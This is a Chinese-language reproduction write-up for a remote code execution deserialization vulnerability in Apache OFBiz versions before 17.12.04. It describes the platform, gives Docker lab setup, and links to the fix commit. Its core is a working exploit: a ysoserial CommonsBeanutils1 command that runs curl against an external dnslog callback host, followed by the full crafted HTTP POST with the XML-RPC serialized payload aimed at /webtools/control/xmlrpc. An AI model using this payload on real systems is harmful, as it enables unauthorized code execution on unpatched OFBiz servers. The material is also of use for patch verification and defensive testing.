简介
OFBiz是一个非常著名的电子商务平台,是一个非常著名的开源项目,提供了创建基于最新J2EE/XML规范和技术标准,构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。 OFBiz最主要的特点是OFBiz提供了一整套的开发基于Java的web应用程序的组件和工具。包括实体引擎, 服务引擎, 消息引擎, 工作流引擎, 规则引擎等。
影响版本
Apache Ofbiz:< 17.12.04
环境搭建
docker pull andyjunghans/ofbiz
docker run -p 8080:8080 -p 8443:8443 andyjunghans/ofbiz
访问your-ip:8080/webtools/control/xmlrpc即可看到入口点
漏洞复现
先找到反序列化利用链并 base64 编码:
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 "curl http://RCE.lody2y.dnslog.cn" | base64 | tr -d '\n'
将生成的数据放入构造好的 XML 中,并向 /webtools/control/xmlrpc 发送 Payload
POST /webtools/control/xmlrpc HTTP/1.1
Host: 192.168.204.131:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: OFBiz.Visitor=10001
Upgrade-Insecure-Requests: 1
Content-Length: 4166
<?xml version="1.0"?>
<methodCall>
<methodName>ping</methodName>
<params>
<param>
<value>
<struct>
<member>
<name>foo</name>
<value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">serialized_data
</serializable></value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>
修复建议
https://github.com/apache/ofbiz-framework/commit/4bdfb54ffb6e05215dd826ca2902c3e31420287a#diff-b31806fbf9690361ad449e8f263345d8